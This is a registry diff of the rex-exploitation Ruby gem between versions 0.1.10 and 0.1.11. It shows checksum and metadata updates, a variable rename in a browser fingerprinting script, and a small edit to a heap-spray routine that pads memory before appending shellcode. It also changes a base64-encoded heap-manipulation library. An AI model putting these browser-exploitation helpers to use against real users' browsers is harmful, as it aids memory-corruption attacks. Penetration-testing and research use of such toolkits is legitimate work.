rex-exploitation 0.1.10 → 0.1.11
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- checksums.yaml +4 -4
- checksums.yaml.gz.sig +0 -0
- data.tar.gz.sig +0 -0
- data/data/js/detect/os.js +6 -6
- data/data/js/memory/property_spray.js +2 -1
- data/lib/rex/exploitation/heaplib.js.b64 +3 -2
- data/lib/rex/exploitation/version.rb +1 -1
- metadata +2 -2
- metadata.gz.sig +0 -0
checksums.yaml
CHANGED
|
@@ -1,7 +1,7 @@
|
|
|
1
1
|
---
|
|
2
2
|
SHA1:
|
|
3
|
-
metadata.gz:
|
|
4
|
-
data.tar.gz:
|
|
3
|
+
metadata.gz: 45940b1990fb22c0fb3459d49c3d8a8a3849840c
|
|
4
|
+
data.tar.gz: ee825e91fc633817f4821c09837d4fb7f7db5976
|
|
5
5
|
SHA512:
|
|
6
|
-
metadata.gz:
|
|
7
|
-
data.tar.gz:
|
|
6
|
+
metadata.gz: c3072b0583cc235df16848ccddb4e9ec21bb86918c1ef9b6473c3030ef13bf1fb3b0f9f7faaa9f41e197a545a78df314562e672895efbb4dd23c81feea99a269
|
|
7
|
+
data.tar.gz: 77cdcabefffb9c49605ae5625a2172d22a8b237a70c35031c31e407f783237926a0b4fd233cdf6ee01d1ff7b0a8de133c0d707642a69129a1de12f1d63102684
|
checksums.yaml.gz.sig
CHANGED
|
Binary file
|
data.tar.gz.sig
CHANGED
|
Binary file
|
data/data/js/detect/os.js
CHANGED
|
@@ -44,7 +44,7 @@ os_detect.getVersion = function(){
|
|
|
44
44
|
var arch = "";
|
|
45
45
|
var useragent = navigator.userAgent;
|
|
46
46
|
// Trust but verify...
|
|
47
|
-
var
|
|
47
|
+
var lying = false;
|
|
48
48
|
|
|
49
49
|
var version = "";
|
|
50
50
|
var unknown_fingerprint = null;
|
|
@@ -75,7 +75,7 @@ os_detect.getVersion = function(){
|
|
|
75
75
|
if (window.opera) {
|
|
76
76
|
ua_name = clients_opera;
|
|
77
77
|
if (!navigator.userAgent.match(/Opera/)) {
|
|
78
|
-
|
|
78
|
+
lying = true;
|
|
79
79
|
}
|
|
80
80
|
// This seems to be completely accurate, e.g. "9.21" is the return
|
|
81
81
|
// value of opera.version() when run on Opera 9.21
|
|
@@ -209,7 +209,7 @@ os_detect.getVersion = function(){
|
|
|
209
209
|
|
|
210
210
|
ua_version = this.searchVersion(search, navigator.userAgent);
|
|
211
211
|
if (!ua_version || 0 == ua_version.length) {
|
|
212
|
-
|
|
212
|
+
lying = true;
|
|
213
213
|
}
|
|
214
214
|
} else if (navigator.oscpu && !document.all && navigator.taintEnabled || 'MozBlobBuilder' in window) {
|
|
215
215
|
// Use taintEnabled to identify FF since other recent browsers
|
|
@@ -369,7 +369,7 @@ os_detect.getVersion = function(){
|
|
|
369
369
|
ua_version = "1";
|
|
370
370
|
}
|
|
371
371
|
if (navigator.oscpu != navigator.platform) {
|
|
372
|
-
|
|
372
|
+
lying = true;
|
|
373
373
|
}
|
|
374
374
|
// oscpu is unaffected by changes in the useragent and has values like:
|
|
375
375
|
// "Linux i686"
|
|
@@ -708,7 +708,7 @@ os_detect.getVersion = function(){
|
|
|
708
708
|
//--
|
|
709
709
|
// Figure out the type of Windows
|
|
710
710
|
//--
|
|
711
|
-
if (!
|
|
711
|
+
if (!lying) {
|
|
712
712
|
version = useragent.toLowerCase();
|
|
713
713
|
} else if (navigator.oscpu) {
|
|
714
714
|
// Then this is Gecko and we can get at least os_name without the
|
|
@@ -801,7 +801,7 @@ os_detect.getVersion = function(){
|
|
|
801
801
|
}
|
|
802
802
|
|
|
803
803
|
this.os_name = os_name;
|
|
804
|
-
this.
|
|
804
|
+
this.lying = lying;
|
|
805
805
|
this.os_vendor = os_vendor;
|
|
806
806
|
this.os_flavor = os_flavor;
|
|
807
807
|
this.os_device = os_device;
|
|
@@ -21,7 +21,8 @@ function sprayHeap( oArg ) {
|
|
|
21
21
|
|
|
22
22
|
sym_div_container.style.cssText = "display:none";
|
|
23
23
|
var data;
|
|
24
|
-
|
|
24
|
+
foo = "%u2020%u2020";
|
|
25
|
+
junk = unescape(foo);
|
|
25
26
|
while (junk.length < offset+0x1000) junk += junk;
|
|
26
27
|
|
|
27
28
|
data = junk.substring(0,offset) + shellcode;
|
|
@@ -54,8 +54,8 @@ YXhBbGxvYyA9IChtYXhBbGxvYyA/IG1heEFsbG9jIDogNjU1MzUpOw0KICAg
|
|
|
54
54
|
IHRoaXMuaGVhcEJhc2UgPSAoaGVhcEJhc2UgPyBoZWFwQmFzZSA6IDB4MTUw
|
|
55
55
|
MDAwKTsNCg0KICAgIC8vIEFsbG9jYXRlIGEgcGFkZGluZyBzdHJpbmcgdGhh
|
|
56
56
|
dCB1c2VzIG1heEFsbG9jIGJ5dGVzDQogICAgdGhpcy5wYWRkaW5nU3RyID0g
|
|
57
|
-
|
|
58
|
-
|
|
57
|
+
IkFBQUEiOw0KDQogICAgZm9yICg7NCArIHRoaXMucGFkZGluZ1N0ci5sZW5n
|
|
58
|
+
dGgqMiArIDIgPCB0aGlzLm1heEFsbG9jOykgew0KICAgICAgICB0aGlzLnBh
|
|
59
59
|
ZGRpbmdTdHIgKz0gdGhpcy5wYWRkaW5nU3RyOw0KICAgIH0NCiAgICANCiAg
|
|
60
60
|
ICAvLyBDcmVhdGUgYW4gYXJyYXkgZm9yIHN0b3JpbmcgcmVmZXJlbmNlcyB0
|
|
61
61
|
byBhbGxvY2F0ZWQgbWVtb3J5DQogICAgdGhpcy5tZW0gPSBuZXcgQXJyYXko
|
|
@@ -329,3 +329,4 @@ ICAgIHZ0YWJsZSArPSB1bmVzY2FwZSgiJXUwMDI4JXUwMDI4IikgKyAgICAv
|
|
|
329
329
|
LyB0d28gc3ViIFtlYXhdLCBhbCBpbnN0cnVjdGlvbnMNCiAgICAgICAgICAg
|
|
330
330
|
ICAgc2hlbGxjb2RlICsgaGVhcC5wYWRkaW5nKChzaXplLTEzOCkvMiAtIHNo
|
|
331
331
|
ZWxsY29kZS5sZW5ndGgpOw0KDQogICAgcmV0dXJuIHZ0YWJsZTsNCn0NCg==
|
|
332
|
+
|
metadata
CHANGED
|
@@ -1,7 +1,7 @@
|
|
|
1
1
|
--- !ruby/object:Gem::Specification
|
|
2
2
|
name: rex-exploitation
|
|
3
3
|
version: !ruby/object:Gem::Version
|
|
4
|
-
version: 0.1.
|
|
4
|
+
version: 0.1.11
|
|
5
5
|
platform: ruby
|
|
6
6
|
authors:
|
|
7
7
|
- David Maloney
|
|
@@ -88,7 +88,7 @@ cert_chain:
|
|
|
88
88
|
G+Hmcg1v810agasPdoydE0RTVZgEOOMoQ07qu7JFXVWZ9ZQpHT7qJATWL/b2csFG
|
|
89
89
|
8mVuTXnyJOKRJA==
|
|
90
90
|
-----END CERTIFICATE-----
|
|
91
|
-
date: 2017-
|
|
91
|
+
date: 2017-02-23 00:00:00.000000000 Z
|
|
92
92
|
dependencies:
|
|
93
93
|
- !ruby/object:Gem::Dependency
|
|
94
94
|
name: bundler
|
metadata.gz.sig
CHANGED
|
Binary file
|